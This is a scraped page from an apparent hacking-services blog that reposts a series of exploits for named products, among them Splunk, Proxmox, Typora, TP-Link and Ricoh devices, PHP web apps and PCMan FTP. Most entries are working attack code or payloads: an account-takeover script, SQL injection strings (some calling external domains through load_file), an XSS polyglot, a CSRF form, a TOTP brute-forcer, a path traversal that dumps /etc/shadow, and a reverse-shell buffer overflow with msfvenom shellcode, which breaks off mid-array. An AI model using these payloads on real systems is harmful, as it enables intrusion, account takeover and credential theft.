Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863104649

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
#!/usr/bin/env python3
#
# Exploit Title: Splunk 9.0.5 - admin account take over
# Author: [Redway Security](https://twitter.com/redwaysec))
# Discovery: [Santiago Lopez](https://twitter.com/santi_lopezz99)

#CVE: CVE-2023-32707

# Vendor Description: A low-privilege user who holds a role that has the `edit_user` capability assigned
# to it can escalate their privileges to that of the admin user by providing specially crafted web requests.
#
# Versions Affected: Splunk Enterprise **below** 9.0.5, 8.2.11, and 8.1.14.
#
import argparse
import requests
import random
import string
import base64
# ignore warnings
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Parse command-line arguments
parser = argparse.ArgumentParser(description='Splunk Authentication')
parser.add_argument('--host', required=True, help='Splunk host or IP address')
parser.add_argument('--username', required=True, help='Splunk username')
parser.add_argument('--password', required=True, help='Splunk password')
parser.add_argument('--target-user', required=True, help='Target user')
parser.add_argument('--force-exploit', action='store_true',
help='Force exploit')

args = parser.parse_args()

# Splunk server settings
splunk_host = args.host.split(':')[0]
splunk_username = args.username
splunk_password = args.password
target_user = args.target_user
force_exploit = args.force_exploit

splunk_port = args.host.split(':')[1] if len(args.host.split(':')) > 1 else 8089
user_endpoint = f"https://{splunk_host}:{splunk_port}/services/authentication/users"

credentials = f"{splunk_username}:{splunk_password}"
base64_credentials = base64.b64encode(credentials.encode()).decode()
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0',
'Authorization': f'Basic {base64_credentials}'

}
proxies = {
# 'http': '[http://127.0.0.1:8080'](<a href=),">http://127.0.0.1:8080',
# 'https': 'http://127.0.0.1:8080'
}

response = requests.get(f"{user_endpoint}/{splunk_username}?output_mode=json",
headers=headers, proxies=proxies, verify=False)

if response.status_code == 200:
affected_versions = ['9.0.4', '8.2.10', '8.1.13']
user = response.json()
splunk_version = user['generator']['version']
# This is not a good way to compare versions.
# There is a range of versions that are affected by this CVE, but this is just a PoC
# 8.1.0 to 8.1.13
# 8.2.0 to 8.2.10
# 9.0.0 to 9.0.4
print(f"Detected Splunk version '{splunk_version}'")
if any(splunk_version <= value for value in affected_versions) or force_exploit:
user_capabilities = user['entry'][0]['content']['capabilities']
if 'edit_user' in user_capabilities:
print(
f"User '{splunk_username}' has the 'edit_user' capability, which would make this target exploitable.")
new_password = ''.join(random.choice(
string.ascii_letters + string.digits) for _ in range(8))
change_password_payload = {
'password': new_password,
'force-change-pass': 0,
'locked-out': 0
}
response = requests.post(f"{user_endpoint}/{target_user}?output_mode=json",
data=change_password_payload, headers=headers, proxies=proxies, verify=False)
if response.status_code == 200:
print(
f"Successfully taken over user '{target_user}', log into Splunk with the password '{new_password}'")
else:
print('Account takeover failed')
else:
print(
f"User '{splunk_username}' does not have the 'edit_user' capability, which makes this target not exploitable by this user.")
else:
print(f"Splunk version '{splunk_version}' is not affected by CVE-2023-32707")
else:
print(
f"Couldn't authenticate to Splunk server '{splunk_host}' with user '{splunk_username}' and password '{splunk_password}'")
exit(1)
HireHackking 
# Exploit Title: Bank Locker Management System - SQL Injection
# Application: Bank Locker Management System
# Date: 12.09.2023
# Bugs: SQL Injection 
# Exploit Author: SoSPiro
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/bank-locker-management-system-using-php-and-mysql/
# Tested on: Windows 10 64 bit Wampserver 

## Description:
This report highlights a critical SQL Injection vulnerability discovered in the "Bank Locker Management System" application. The vulnerability allows an attacker to bypass authentication and gain unauthorized access to the application.

## Vulnerability Details:
- **Application Name**: Bank Locker Management System
- **Software Link**: [Download Link](https://phpgurukul.com/bank-locker-management-system-using-php-and-mysql/)
- **Vendor Homepage**: [Vendor Homepage](https://phpgurukul.com/)

## Vulnerability Description:
The SQL Injection vulnerability is present in the login mechanism of the application. By providing the following payload in the login and password fields:

Payload: admin' or '1'='1-- -

An attacker can gain unauthorized access to the application with administrative privileges.

## Proof of Concept (PoC):
1. Visit the application locally at http://blms.local (assuming it's hosted on localhost).
2. Navigate to the "banker" directory: http://blms.local/banker/
3. In the login and password fields, input the following payload:
4. admin' or '1'='1-- -
HireHackking 
# Exploit Title: Blood Bank & Donor Management System using v2.2 - Stored XSS
# Application: Blood Donor Management System
# Version: v2.2   
# Bugs:  Stored XSS
# Technology: PHP
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/blood-bank-donor-management-system-free-download/
# Date: 12.09.2023
# Author: SoSPiro
# Tested on: Windows

#POC
========================================
1. Login to admin account
2. Go to /admin/update-contactinfo.php
3. Change "Adress" or " Email id " or " Contact Number" inputs and add "/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert('1') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e" payload.
4. Go to http://bbdms.local/inedx.php page and XSS will be triggered.
HireHackking 
# Exploit Title: Typora v1.7.4 - OS Command Injection
# Discovered by: Ahmet Ümit BAYRAM
# Discovered Date: 13.09.2023
# Vendor Homepage: http://www.typora.io
# Software Link: https://download.typora.io/windows/typora-setup-ia32.exe
# Tested Version: v1.7.4 (latest)
# Tested on: Windows 2019 Server 64bit

# # #  Steps to Reproduce # # #

# Open the application
# Click on Preferences from the File menu
# Select PDF from the Export tab
# Check the “run command” at the bottom right and enter your reverse shell
command into the opened box
# Close the page and go back to the File menu
# Then select PDF from the Export tab and click Save
# Reverse shell is ready!
HireHackking 
## Title: PHP Shopping Cart-4.2 Multiple-SQLi
## Author: nu11secur1ty
## Date: 09/13/2023
## Vendor: https://www.phpjabbers.com/
## Software:https://www.phpjabbers.com/php-shopping-cart-script/#sectionPricing
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The `id` parameter appears to be vulnerable to SQL injection attacks.
A single quote was submitted in the id parameter, and a database error
message was returned. Two single quotes were then submitted and the
error message disappeared. The attacker easily can steal all
information from the database of this web application!
WARNING! All of you: Be careful what you buy! This will be your responsibility!

[+]Payload:
mysql

Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: controller=pjFront&action=pjActionGetStocks&id=1') OR NOT
3795=3795-- sRcp&session_id=

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (GTID_SUBSET)
    Payload: controller=pjFront&action=pjActionGetStocks&id=1') AND
GTID_SUBSET(CONCAT(0x71717a6b71,(SELECT
(ELT(3820=3820,1))),0x7178627871),3820)-- kQZA&session_id=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: controller=pjFront&action=pjActionGetStocks&id=1') AND
(SELECT 2625 FROM (SELECT(SLEEP(5)))nVyA)-- FGLs&session_id=

## Reproduce:
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/PHP-Shopping-Cart-4.2

## Proof and Exploit:
https://www.nu11secur1ty.com/2023/09/php-shopping-cart-42-multiple-sqli.html

System Administrator - Infrastructure Engineer
Penetration Testing Engineer
nu11secur1ty <http://nu11secur1ty.com/>
HireHackking 
## Title: Fundraising Script-1.0 SQLi
## Author: nu11secur1ty
## Date: 09/13/2023
## Vendor: https://www.phpjabbers.com/
## Software: https://www.phpjabbers.com/fundraising-script/#sectionDemo
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The `cid` parameter appears to be vulnerable to SQL injection attacks.
The payload ' was submitted in the cid parameter, and a database error
message was returned.
The database is empty, but if it is not, this will be over for the
money of the donors and their bank accounts!
The attacker can steal all information from the database!

[+]Payload:
mysql

Parameter: cid (GET)
    Type: error-based
    Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
    Payload: controller=pjFront&action=pjActionLoadCampaign&cid=(UPDATEXML(1741,CONCAT(0x2e,0x71626b7071,(SELECT
(ELT(1741=1741,1))),0x7162787171),3873))

https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Fundraising-Script-1.0

System Administrator - Infrastructure Engineer
Penetration Testing Engineer
nu11secur1ty <http://nu11secur1ty.com/>
HireHackking 
# Exploit Title: Academy LMS 6.2 - SQL Injection
# Exploit Author: CraCkEr
# Date: 29/08/2023
# Vendor: Creativeitem
# Vendor Homepage: https://creativeitem.com/
# Software Link: https://demo.creativeitem.com/academy/
# Tested on: Windows 10 Pro
# Impact: Database Access
# CVE: CVE-2023-4974
# CWE: CWE-89 / CWE-74 / CWE-707


## Greetings

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob


## Description

SQL injection attacks can allow unauthorized access to sensitive data, modification of
data and crash the application or make it unavailable, leading to lost revenue and
damage to a company's reputation.


Path: /academy/tutor/filter

GET parameter 'price_min' is vulnerable to SQL Injection
GET parameter 'price_max' is vulnerable to SQL Injection

https://website/academy/tutor/filter?searched_word=&searched_tution_class_type%5B%5D=1&price_min=[SQLi]&price_max=[SQLi]&searched_price_type%5B%5D=hourly&searched_duration%5B%5D=0

---
Parameter: price_min (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: searched_word=&searched_tution_class_type[]=1&price_min=(SELECT(0)FROM(SELECT(SLEEP(7)))a)&price_max=9&searched_price_type[]=hourly&searched_duration[]=0

Parameter: price_max (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: searched_word=&searched_tution_class_type[]=1&price_min=1&price_max=(SELECT(0)FROM(SELECT(SLEEP(9)))a)&searched_price_type[]=hourly&searched_duration[]=0
---


[-] Done
HireHackking 
#Exploit Title: Ricoh Printer Directory and File Exposure 
#Date: 9/15/2023
#Exploit Author: Thomas Heverin (Heverin Hacker)
#Vendor Homepage: https://www.ricoh.com/products/printers-and-copiers
#Software Link: https://replit.com/@HeverinHacker/Ricoh-Printer-Directory-and-File-Finder#main.py
#Version: Ricoh Printers - All Versions
#Tested on: Windows
#CVE: N/A 

#Directories Found: Help, Info (Printer Information), Prnlog (Print Log), Stat (Statistics) and Syslog (System Log)

from ftplib import FTP

def ftp_connect(ip):
    try:
        ftp = FTP(ip)
        ftp.login("guest", "guest")
        print(f"Connected to {ip} over FTP as 'guest'")
        return ftp
    except Exception as e:
        print(f"Failed to connect to {ip} over FTP: {e}")
        return None

if __name__ == "__main__":
    target_ip = input("Enter the Ricoh Printer IP address: ")
    
    ftp_connection = ftp_connect(target_ip)
    if ftp_connection:
        try:
            while True:
                file_list = ftp_connection.nlst()
                print("List of Ricoh printer files and directories:")
                for index, item in enumerate(file_list, start=1):
                    print(f"{index}. {item}")
                
                file_index = int(input("Enter the printer index of the file to read (1-based), or enter 0 to exit: ")) - 1
                if file_index < 0:
                    break
                
                if 0 <= file_index < len(file_list):
                    selected_file = file_list[file_index]
                    lines = []
                    ftp_connection.retrlines("RETR " + selected_file, lines.append)
                    print(f"Contents of '{selected_file}':")
                    for line in lines:
                        print(line)
                else:
                    print("Invalid file index.")
        except Exception as e:
            print(f"Failed to perform operation: {e}")
        finally:
            ftp_connection.quit()
HireHackking

101 News 1.0 - Multiple-SQLi 

## Title: 101 News-1.0 Multiple-SQLi
## Author: nu11secur1ty
## Date: 09/16/2023
## Vendor: https://mayurik.com/
## Software: https://www.sourcecodester.com/php/16067/best-online-news-portal-project-php-free-download.html
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The searchtitle parameter appears to be vulnerable to SQL injection
attacks. The payload '+(select
load_file('\\\\sple0q0yfc2wv1hbekfzk7vtikoec6gu7xvpif64.oastify.com\\utu'))+'
was submitted in the searchtitle parameter. This payload injects a SQL
sub-query that calls MySQL's load_file function with a UNC file path
that references a URL on an external domain. The application
interacted with that domain, indicating that the injected SQL query
was executed.


[+]Payload:
```mysql
---
Parameter: searchtitle (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: searchtitle=-7320%' OR 3167=3167 AND 'urvA%'='urvA

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: searchtitle=814271'+(select
load_file('\\\\sple0q0yfc2wv1hbekfzk7vtikoec6gu7xvpif64.tupaputka.com\\utu'))+'%'
AND (SELECT 8775 FROM (SELECT(SLEEP(15)))yMEL) AND 'gPWH%'='gPWH

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: searchtitle=814271'+(select
load_file('\\\\sple0q0yfc2wv1hbekfzk7vtikoec6gu7xvpif64.tupaputka.com\\utu'))+'%'
UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,CONCAT(0x71627a6a71,0x4b6d704e6546715a6662496571705179434d6d5a71586b567a4278464c564d61766174626f787063,0x7170767071),NULL,NULL#

## Reproduce:
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/101%20News-1.0

## Proof and Exploit:
https://www.nu11secur1ty.com/2023/09/101-news-10-multiple-sqli.html

System Administrator - Infrastructure Engineer
Penetration Testing Engineer
nu11secur1ty <http://nu11secur1ty.com/>
HireHackking

Grocy <=4.0.2 - CSRF 

# Exploit Title: Grocy <= 4.0.2 CSRF Vulnerability
# Application: Grocy
# Version: <= 4.0.2
# Date: 09/21/2023
# Exploit Author: Chance Proctor
# Vendor Homepage: https://grocy.info/
# Software Link: https://github.com/grocy/grocy
# Tested on: Linux
# CVE : CVE-2023-42270



Overview
==================================================
When creating a new user in Grocy 4.0.2, the new user request is made using JSON formatting.
This makes it easy to adjust your request since it is a known format. 
There is also no CSRF Token or other methods of verification in place to verify where the request is coming from.
This allows for html code to generate a new user as long as the target is logged in and has Create User Permissions.



Proof of Concept
==================================================
Host the following html code via a XSS or delivery via a phishing campaign:

	<html>
	<form action="/api/users" method="post" enctype="application/x-www-form-urlencoded">
	<input name='username' value='hacker' type='hidden'>
	<input name='password' value='test' type='hidden'>
	<input type=submit>
	</form>
	<script>
	history.pushState('','', '/');
	document.forms[0].submit();
	</script>
	</html>


If a user is logged into the Grocy Webapp at time of execution, a new user will be created in the app with the following credentials

	Username: hacker
	Password: test

Note:
In order for this to work, the target must have Create User Permissions.
This is enabled by default.



Proof of Exploit/Reproduce
==================================================
http://xploit.sh/posts/cve-2023-42270/
HireHackking 
# Exploit Title: Proxmox VE TOTP Brute Force
# Date: 09/23/2023
# Exploit Author: Cory Cline, Gabe Rust
# Vendor Homepage: https://www.proxmox.com/en/
# Software Link: http://download.proxmox.com/iso/
# Version: 5.4 - 7.4-1
# Tested on: Debian
# CVE : CVE-2023-43320

import time
import requests
import urllib.parse
import json
import os
import urllib3

urllib3.disable_warnings()
threads=25

#################### REPLACE THESE VALUES #########################
password="KNOWN PASSWORD HERE"
username="KNOWN USERNAME HERE"
target_url="https://HOST:PORT"
##################################################################

ticket=""
ticket_username=""
CSRFPreventionToken=""
ticket_data={}

auto_refresh_time = 20 # in minutes - 30 minutes before expiration
last_refresh_time = 0

tokens = [];

for num in range(0,1000000):
    tokens.append(str(num).zfill(6))

def refresh_ticket(target_url, username, password):
    global CSRFPreventionToken
    global ticket_username
    global ticket_data
    refresh_ticket_url = target_url + "/api2/extjs/access/ticket"
    refresh_ticket_cookies = {}
    refresh_ticket_headers = {}
    refresh_ticket_data = {"username": username, "password": password, "realm": "pve", "new-format": "1"}
    ticket_data_raw = urllib.parse.unquote(requests.post(refresh_ticket_url, headers=refresh_ticket_headers, cookies=refresh_ticket_cookies, data=refresh_ticket_data, verify=False).text)
    ticket_data = json.loads(ticket_data_raw)
    CSRFPreventionToken = ticket_data["data"]["CSRFPreventionToken"]
    ticket_username = ticket_data["data"]["username"]

def attack(token):
    global last_refresh_time
    global auto_refresh_time
    global target_url
    global username
    global password
    global ticket_username
    global ticket_data
    if ( int(time.time()) > (last_refresh_time + (auto_refresh_time * 60)) ):
        refresh_ticket(target_url, username, password)
        last_refresh_time = int(time.time())

    url = target_url + "/api2/extjs/access/ticket"
    cookies = {}
    headers = {"Csrfpreventiontoken": CSRFPreventionToken}
    stage_1_ticket = str(json.dumps(ticket_data["data"]["ticket"]))[1:-1]
    stage_2_ticket = stage_1_ticket.replace('\\"totp\\":', '\"totp\"%3A').replace('\\"recovery\\":', '\"recovery\"%3A')
    data = {"username": ticket_username, "tfa-challenge": stage_2_ticket, "password": "totp:" + str(token)}
    response = requests.post(url, headers=headers, cookies=cookies, data=data, verify=False)
    if(len(response.text) > 350):
        print(response.text)
        os._exit(1)

while(1):
    refresh_ticket(target_url, username, password)
    last_refresh_time = int(time.time())

    with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:
        res = [executor.submit(attack, token) for token in tokens]
        concurrent.futures.wait(res)
HireHackking 
RoyalTSX 6.0.1 RTSZ File Handling Heap Memory Corruption PoC


Vendor: Royal Apps GmbH
Web page: https://www.royalapps.com
Affected version: 6.0.1.1000 (macOS)

Summary: Royal TS is an ideal tool for system engineers and
other IT professionals who need remote access to systems with
different protocols. Not only easy to use, it enables secure
multi-user document sharing.

Desc: The application receives SIGABRT after RAPortCheck.createNWConnection()
function is handling the SecureGatewayHost object in the RoyalTSXNativeUI.
When the hostname has an array of around 1600 bytes and Test Connection is
clicked the app crashes instantly.

Tested on: MacOS 13.5.1 (Ventura)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2023-5788
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5788.php


05.09.2023

--


-------------------------------------
Translated Report (Full Report Below)
-------------------------------------

Process:               RoyalTSX [23807]
Path:                  /Applications/Royal TSX.app/Contents/MacOS/RoyalTSX
Identifier:            com.lemonmojo.RoyalTSX.App
Version:               6.0.1 (6.0.1.1000)
Code Type:             X86-64 (Native)
Parent Process:        launchd [1]
User ID:               503

Date/Time:             2023-09-05 16:09:46.6361 +0200
OS Version:            macOS 13.5.1 (22G90)
Report Version:        12
Bridge OS Version:     7.6 (20P6072)

Time Awake Since Boot: 21000 seconds
Time Since Wake:       1106 seconds

System Integrity Protection: enabled

Crashed Thread:        0  tid_103  Dispatch queue: com.apple.main-thread

Exception Type:        EXC_BAD_ACCESS (SIGABRT)
Exception Codes:       KERN_INVALID_ADDRESS at 0x0000000000000050
Exception Codes:       0x0000000000000001, 0x0000000000000050

Termination Reason:    Namespace SIGNAL, Code 6 Abort trap: 6
Terminating Process:   RoyalTSX [23807]

VM Region Info: 0x50 is not in any region.  Bytes before following region: 140737488273328
      REGION TYPE                    START - END         [ VSIZE] PRT/MAX SHRMOD  REGION DETAIL
      UNUSED SPACE AT START
--->  
      shared memory            7ffffffec000-7ffffffed000 [    4K] r-x/r-x SM=SHM  

Application Specific Information:
abort() called


Thread 0 Crashed:: tid_103 Dispatch queue: com.apple.main-thread
0   libsystem_kernel.dylib        	    0x7ff809ef7202 __pthread_kill + 10
1   libsystem_pthread.dylib       	    0x7ff809f2eee6 pthread_kill + 263
2   libsystem_c.dylib             	    0x7ff809e55b45 abort + 123
3   libmonosgen-2.0.1.dylib       	       0x1028daa1b altstack_handle_and_restore + 235
4   libmonosgen-2.0.1.dylib       	       0x102879db6 summarize_frame_internal + 310
5   libmonosgen-2.0.1.dylib       	       0x102879f66 summarize_frame + 198
6   libmonosgen-2.0.1.dylib       	       0x10287578f mono_walk_stack_full + 1135
7   libmonosgen-2.0.1.dylib       	       0x102873944 mono_summarize_managed_stack + 100
8   libmonosgen-2.0.1.dylib       	       0x102a0f478 mono_threads_summarize_execute_internal + 1256
9   libmonosgen-2.0.1.dylib       	       0x102a0f8aa mono_threads_summarize + 346
10  libmonosgen-2.0.1.dylib       	       0x1028e0b67 mono_dump_native_crash_info + 855
11  libmonosgen-2.0.1.dylib       	       0x10287864e mono_handle_native_crash + 318
12  libmonosgen-2.0.1.dylib       	       0x1027d1966 mono_crashing_signal_handler + 86
13  libsystem_platform.dylib      	    0x7ff809f5c5ed _sigtramp + 29
14  ???                           	       0x101e9502c ???
15  RoyalTSXNativeUI              	       0x109e50012 RAPortCheck.createNWConnection() + 290
16  RoyalTSXNativeUI              	       0x109e4f6d2 RAPortCheck.connect() + 242
17  RoyalTSXNativeUI              	       0x10a021c70 static RASecureGatewayPropertyPageHelper.testConnection(hostname:port:logger:localizer:parentWindow:progressIndicator:testConnectionButton:) + 592
18  RoyalTSXNativeUI              	       0x10a0b94e7 RAPropertyPageSecureGatewayMain.testConnection() + 359
19  RoyalTSXNativeUI              	       0x10a0b9573 @objc RAPropertyPageSecureGatewayMain.buttonTestConnection_action(_:) + 51
20  AppKit                        	    0x7ff80d29742c -[NSApplication(NSResponder) sendAction:to:from:] + 323
21  AppKit                        	    0x7ff80d2972b0 -[NSControl sendAction:to:] + 86
22  AppKit                        	    0x7ff80d2971e2 __26-[NSCell _sendActionFrom:]_block_invoke + 131
23  AppKit                        	    0x7ff80d2970eb -[NSCell _sendActionFrom:] + 171
24  AppKit                        	    0x7ff80d297031 -[NSButtonCell _sendActionFrom:] + 96
25  AppKit                        	    0x7ff80d293ee5 NSControlTrackMouse + 1816
26  AppKit                        	    0x7ff80d2937a9 -[NSCell trackMouse:inRect:ofView:untilMouseUp:] + 121
27  AppKit                        	    0x7ff80d29367c -[NSButtonCell trackMouse:inRect:ofView:untilMouseUp:] + 606
28  AppKit                        	    0x7ff80d292ac0 -[NSControl mouseDown:] + 659
29  AppKit                        	    0x7ff80d290f9d -[NSWindow(NSEventRouting) _handleMouseDownEvent:isDelayedEvent:] + 4330
30  AppKit                        	    0x7ff80d2087d7 -[NSWindow(NSEventRouting) _reallySendEvent:isDelayedEvent:] + 404
31  AppKit                        	    0x7ff80d208427 -[NSWindow(NSEventRouting) sendEvent:] + 345
32  AppKit                        	    0x7ff80d206e01 -[NSApplication(NSEvent) sendEvent:] + 345
33  AppKit                        	    0x7ff80d3413ae -[NSApplication _doModalLoop:peek:] + 360
34  AppKit                        	    0x7ff80d4c2219 __33-[NSApplication runModalSession:]_block_invoke_2 + 69
35  AppKit                        	    0x7ff80d4c21c1 __33-[NSApplication runModalSession:]_block_invoke + 78
36  AppKit                        	    0x7ff80d33f773 _NSTryRunModal + 100
37  AppKit                        	    0x7ff80d4c20be -[NSApplication runModalSession:] + 128
38  RoyalTSXNativeUI              	       0x109f17044 RAPropertiesWindowController._showModal() + 628
39  RoyalTSXNativeUI              	       0x109f17548 @objc RAPropertiesWindowController._showModal() + 24
40  Foundation                    	    0x7ff80ae84951 -[NSObject(NSThreadPerformAdditions) performSelector:onThread:withObject:waitUntilDone:modes:] + 379
41  Foundation                    	    0x7ff80ae84676 -[NSObject(NSThreadPerformAdditions) performSelectorOnMainThread:withObject:waitUntilDone:] + 124
42  libffi.dylib                  	    0x7ff81a5fd8c2 ffi_call_unix64 + 82
43  libffi.dylib                  	    0x7ff81a5fd214 ffi_call_int + 830

Thread 0 crashed with X86 Thread State (64-bit):
  rax: 0x0000000000000000  rbx: 0x00007ff84d608700  rcx: 0x00007ff7be10fbc8  rdx: 0x0000000000000000
  rdi: 0x0000000000000103  rsi: 0x0000000000000006  rbp: 0x00007ff7be10fbf0  rsp: 0x00007ff7be10fbc8
   r8: 0x0000000000000212   r9: 0x00007fafaeaf64a8  r10: 0x0000000000000000  r11: 0x0000000000000246
  r12: 0x0000000000000103  r13: 0x00007ff7be110418  r14: 0x0000000000000006  r15: 0x0000000000000016
  rip: 0x00007ff809ef7202  rfl: 0x0000000000000246  cr2: 0x00007ff84d611068
  
Logical CPU:     0
Error Code:      0x02000148 
Trap Number:     133

Thread 0 instruction stream:
  0f 84 24 01 00 00 49 8b-79 08 4c 89 45 c0 89 4d  ..$...I.y.L.E..M
  d4 48 89 55 c8 4d 89 cc-e8 5d 79 0e 00 48 89 c3  .H.U.M...]y..H..
  4b 8d 7c 3e 04 48 8b 73-30 ba 8c 00 00 00 e8 07  K.|>.H.s0.......
  7f 25 00 4c 8b 45 c0 48-8b 43 58 4b 89 84 3e a0  .%.L.E.H.CXK..>.
  00 00 00 41 8b 44 24 04-43 89 84 3e 90 00 00 00  ...A.D$.C..>....
  48 8b 43 38 4b 89 84 3e-a8 00 00 00 48 8b 43 60  H.C8K..>....H.C`
 [8b]40 50 43 89 84 3e b0-00 00 00 8b 43 40 43 89  .@PC..>.....C@C.	<==
  84 3e b4 00 00 00 48 8b-45 c8 43 89 84 3e 98 00  .>....H.E.C..>..
  00 00 8b 45 d4 43 89 84-3e 94 00 00 00 eb 18 48  ...E.C..>......H
  8d 05 80 ff 26 00 e9 96-00 00 00 43 c7 84 3e 90  ....&......C..>.
  00 00 00 ff ff ff ff 49-8b 45 10 48 8b 18 41 83  .......I.E.H..A.
  38 00 74 24 4b 8d 7c 3e-04 4d 89 c4 e8 69 d8 14  8.t$K.|>.M...i..

Binary Images:
       0x101deb000 -        0x101df6fff com.lemonmojo.RoyalTSX.App (6.0.1) <328845a4-2e68-3c0f-a495-033ac725bb43> /Applications/Royal TSX.app/Contents/MacOS/RoyalTSX
...
...
HireHackking 
# Exploit Title: GoAhead Web Server 2.5 - 'goform/formTest' Multiple HTML Injection Vulnerabilities
# Date: 25/9/2023
# Exploit Author: Syed Affan Ahmed (ZEROXINN)
# Vendor Homepage: https://www.embedthis.com/goahead/
# Affected Version: 2.5 may be others.
# Tested On Version: 2.5 in ZTE AC3630

---------------------------POC---------------------------

GoAhead Web Server Version 2.5 is prone to Multiple HTML-injection vulnerabilities due to inadequate input validation.

HTML Injection can cause the ability to execute within the context of that site.

http://192.168.0.1/goform/formTest?name=<h1>Hello</h1>&address=<h1>World</h1>
HireHackking 
# Exploit Title: TP-Link TL-WR740N UnAuthenticated Directory Transversal
# Date: 25/9/2023
# Exploit Author: Syed Affan Ahmed (ZEROXINN)
# Vendor Homepage: http://www.tp-link.com
# Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n
# Tested on: TP-Link TL-WR740N

---------------------------POC---------------------------

Request
-------

GET /help/../../../etc/shadow HTTP/1.1
Host: 192.168.0.1:8082
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ipaddr=192.168.0.100; mLangage=Âée; exception=4
Connection: close

Response
--------

HTTP/1.1 200 OK
Server: Router Webserver
Connection: close
WWW-Authenticate: Basic realm="TP-LINK Wireless Lite N Router WR740N"
Content-Type: text/html

<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
<HTML>
<HEAD><TITLE>TL-WR740N</TITLE>
<META http-equiv=Pragma content=no-cache>
<META http-equiv=Expires content="wed, 26 Feb 1997 08:21:57 GMT">
<LINK href="/dynaform/css_help.css" rel=stylesheet type="text/css">
<SCRIPT language="javascript" type="text/javascript"><!--
if(window.parent == window){window.location.href="http://192.168.0.1";}
function Click(){ return false;}
document.oncontextmenu=Click;
function doPrev(){history.go(-1);}
//--></SCRIPT>
root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
bin::10933:0:99999:7:::
daemon::10933:0:99999:7:::
adm::10933:0:99999:7:::
lp:*:10933:0:99999:7:::
sync:*:10933:0:99999:7:::
shutdown:*:10933:0:99999:7:::
halt:*:10933:0:99999:7:::
uucp:*:10933:0:99999:7:::
operator:*:10933:0:99999:7:::
nobody::10933:0:99999:7:::
ap71::10933:0:99999:7:::
HireHackking 
# Exploit Title: PCMan FTP Server 2.0 - 'pwd' Remote Buffer Overflow
# Date: 09/25/2023
# Exploit Author: Waqas Ahmed Faroouqi (ZEROXINN)
# Vendor Homepage: http://pcman.openfoundry.org/
# Software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z
# Version: 2.0
# Tested on: Windows XP SP3

#!/usr/bin/python

import socket

#buffer = 'A' * 2500
#offset = 2007
#badchars=\x00\x0a\x0d
#return_address=0x7e429353 (USER32.dll)
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.146.130 LPORT=4444 EXITFUNC=thread -f c -b "\x00\x0a\x0d"
#nc -nvlp 4444

overflow = (
"\xdb\xce\xd9\x74\x24\xf4\xba\xc1\x93\x3a\xcc\x58\x31\xc9"
"\xb1\x52\x31\x50\x17\x03\x50\x17\x83\x01\x97\xd8\x39\x7d"
"\x70\x9e\xc2\x7d\x81\xff\x4b\x98\xb0\x3f\x2f\xe9\xe3\x8f"
"\x3b\xbf\x0f\x7b\x69\x2b\x9b\x09\xa6\x5c\x2c\xa7\x90\x53"
"\xad\x94\xe1\xf2\x2d\xe7\x35\xd4\x0c\x28\x48\x15\x48\x55"
"\xa1\x47\x01\x11\x14\x77\x26\x6f\xa5\xfc\x74\x61\xad\xe1"
"\xcd\x80\x9c\xb4\x46\xdb\x3e\x37\x8a\x57\x77\x2f\xcf\x52"
"\xc1\xc4\x3b\x28\xd0\x0c\x72\xd1\x7f\x71\xba\x20\x81\xb6"
"\x7d\xdb\xf4\xce\x7d\x66\x0f\x15\xff\xbc\x9a\x8d\xa7\x37"
